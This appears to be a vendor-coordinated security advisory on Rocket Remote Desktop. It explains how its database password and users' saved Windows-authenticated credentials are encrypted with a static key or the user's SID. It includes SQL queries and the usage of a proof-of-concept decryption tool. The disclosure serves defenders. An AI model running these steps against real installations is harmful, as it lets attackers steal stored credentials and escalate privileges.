Contact

Get in Contact Now

+49 241 5100810
kontakt@redteam-pentesting.de
Contact form
RedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting Header

Insecure Storage and Weak Encryption of Credentials in Rocket Remote Desktop

Attackers with access to a computer with Rocket Remote Desktop can read the credentials of the global database. With these credentials, they can view and decrypt the saved credentials of all users who authenticated to the software using Windows Authentication. This is not limited to the credentials of the current client, but to all such credentials in the global database.

Details

Introduction

Used by over 200,000 IT professionals across the world, Rocket Remote Desktop software simplifies remote access and administration of desktops, servers and systems.

[…]

Security at the Core: Reduce security risks with AES-256Bit encryption

(from vendor’s website)

More Details

The desktop clients of Rocket Remote Desktop communicate with a central database, for example to retrieve the connections and credentials stored in the software. For this, the credentials to access the database are saved in a configuration file located at:

C:\ProgramData\Rocket Remote Desktop\18.0\environments.xml

The file environments.xml contains information similar to the following:

<?xml version="1.0"?>
<ArrayOfEnvironmentData xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <EnvironmentData>
    <EnvironmentType>Database</EnvironmentType>
    <EnvironmentProtection>WindowsAccount</EnvironmentProtection>
    <ConnectionString>Data Source=192.0.2.1;Initial Catalog=RocketDB;Integrated Security=False;User ID=sa;Password=[base64 ciphertext];Encrypt=false</ConnectionString>
    <AllUsersEnvironment>true</AllUsersEnvironment>
    <EnvironmentName>RocketDB</EnvironmentName>
  </EnvironmentData>
</ArrayOfEnvironmentData>

The Password field in the ConnectionString is encrypted with a static AES key, which can be decrypted using the routine CommonHelper.Helper.ConnectionHelper.DecryptConnectionString from CommonHelper.dll, which uses encryption routines provided by vSIT2.dll.

In the database, credentials are saved as Items:

$ mssqlclient.py 'sa:plaintextPassword@192.0.2.1' -db RocketDB
SQL (sa  dbo@RocketDB)> SELECT * FROM Items WHERE ItemId = 'B8737264-6079-456D-9B99-CD381FDC606E';
ItemId        B8737264-6079-456D-9B99-CD381FDC606E
UserId        B6103A2A-CFE5-4ABF-9DB4-E31CAEBD8303
Text          domain\username
Private       1
Description
[...]

The data for an item is saved in the ItemProperties table:

SQL (sa  dbo@RocketDB)>  SELECT * FROM ItemProperties WHERE ItemId = 'B8737264-6079-456D-9B99-CD381FDC606E';
ItemId          B8737264-6079-456D-9B99-CD381FDC606E
[...]
Data            [base64 XML]

The Data for a credential is encoded using Base64 and looks like the following:

<?xml version="1.0"?>
<CredentialsSaveProperties xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <Username>username</Username>
  <Domain>domain</Domain>
  <Password>[base64 ciphertext]</Password>
  <AlwaysPromptForPassword>false</AlwaysPromptForPassword>
  <UseLocalComputer>false</UseLocalComputer>
  <PwLastModified>2026-01-01T01:01:01.0000000Z</PwLastModified>
  <ResolveCredExternal />
  <Custom1 />
  <Custom2 />
  <Custom3 />
  <TwoFaUsage>None</TwoFaUsage>
  <UseBase64Secure>true</UseBase64Secure>
</CredentialsSaveProperties>

The Password field is encrypted using AES-256. Credentials of users who authenticated using Windows Authentication are encrypted using the SID of the user and a static padding as key and IV. With password authentication, the user password is used instead as key and IV. This SID can also be retrieved from the database itself, in the Users table:

SQL (sa  dbo@RocketDB)> SELECT * FROM Users WHERE UserId = 'B6103A2A-CFE5-4ABF-9DB4-E31CAEBD8303';
UserId    B6103A2A-CFE5-4ABF-9DB4-E31CAEBD8303
Name      username
Domain    domain
Sid       S-1-5-21-3623811015-3361044348-30300820-1013
[...]

The credentials can be decrypted using the routines vSecureIT2.InitializeUntrustedUser and vSecureIT2.GetClearTextPassword from vSIT2.dll.

Proof of Concept

The code for the .NET utility can be downloaded here. The .DLLs CommonHelper.dll and vSIT2.dll, which are part of Rocket Remote Desktop, have to be present in the same directory. Running the proof of concept without arguments shows usage information:

$ ./rocket_decrypt
Usage: rocket_decrypt connectionString [encrypted ConnectionString]
                      password [encrypted blob] [User-SID]

To decrypt a connection string use the connectionString command:

$ ./rocket_decrypt connectionString 'Data Source=192.0.2.1;Initial Catalog=RocketDB;Integrated Security=False;User ID=sa;Password=JjXzNvVwaOPxsHzQzp6CITl+aI15aXBwKq3lZepuB1c=;Encrypt=false'

Data Source=192.0.2.1;Initial Catalog=RocketDB;Integrated Security=False;User ID=sa;Password=clearTextDBPassword;Encrypt=false

To decrypt a password blob use the password command and supply the user’s SID:

$ ./rocket_decrypt password nux82JgNjbhuRnbSZ7uyEr77NnU+cpSgx7Np/MPsjjIRmYqcaYVRWMxc7escZNL/BSjwecNXbaRVJ9zGZzwsn1Ua1KA8Bi1z5OnD+kRxPQa1cTOR5dXacQGzcfE7Qg4YKxcDVlnFUgkByQ7UcY1n3dDRfx1DJYJ8CklyXI0cxVCqJFnlSlMy2MMrUOtUMs2teSWs6HM8HjVMcBCyklDesqaaprqb4MEWMND3MbmtSwYGisfeRIchSrIwv8MKrz8jsBkWSqVF5Z8GyyrcAlusjCaiE4Sqd++BgHVQTDr3s1xF0x91woO4qQcsGlJbeK5yIQvwzoDHYwl8h8mlTtHNy/VX8UL1Z1ccMTA6VdBMa+jKMqWr3YFd1qciEgdBjNG004TuJaThdfgeloqLhqcJGocpVDC7V4L7VoA7yXvGv2A1D/2lyKKJNORPGz62lqu+jAAXWP6IFEasTFJj4DGENWn2CmRZq16SFNssB/CM0MWghKjgZcUt7OTYK3BFz4+3slTsaL3ZJw+/tH50FNbGL9fJx/r+Q04pMKlHfKYXTNg0pcT56oEOR71ray+7xz/lJlgwjgOGVN9SM+mPalsO6YXJWOr0SGyjUo/q7x9pgmPNmLNGASMSwWnoiyKbZQlIWxgOI/C31YgICxPPMx7W+LfUwdtJhXIxyvLzgFse3gbKcSV89LWxD2xBt6EPEklm S-1-5-21-3623811015-3361044348-30300820-1013

clearTextPassword

Workaround

For the credentials saved in the global database: Avoid saving credentials in Rocket Remote Desktop directly, use the Password Manager integration. If credentials have been saved, especially using Windows Authentication, delete and change them.

Fix

Currently no fix available.

Security Risk

Attackers with access to a Rocket Remote Desktop client can view the credentials saved in the database by all users authenticated with Windows Authentication.

The risk highly depends on the usage of the software: Especially in cases where both users with low and high privileges are using the software simultaneously, an attacker with a low privileged account could escalate privileges by gaining access to saved accounts of high privileged users. This is considered to pose a medium risk.

Timeline

  • 2026-06-12 Vulnerability identified
  • 2026-06-17 Customer approved disclosure to vendor
  • 2026-06-22 CVE ID requested
  • 2026-06-22 Asked vendor for security contact
  • 2026-06-22 Vendor sent upload link for advisory
  • 2026-06-22 Advisory sent to vendor
  • 2026-08-18 Asked vendor for update
  • 2026-09-17 Notified vendor about upcoming disclosure date
  • 2026-09-21 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/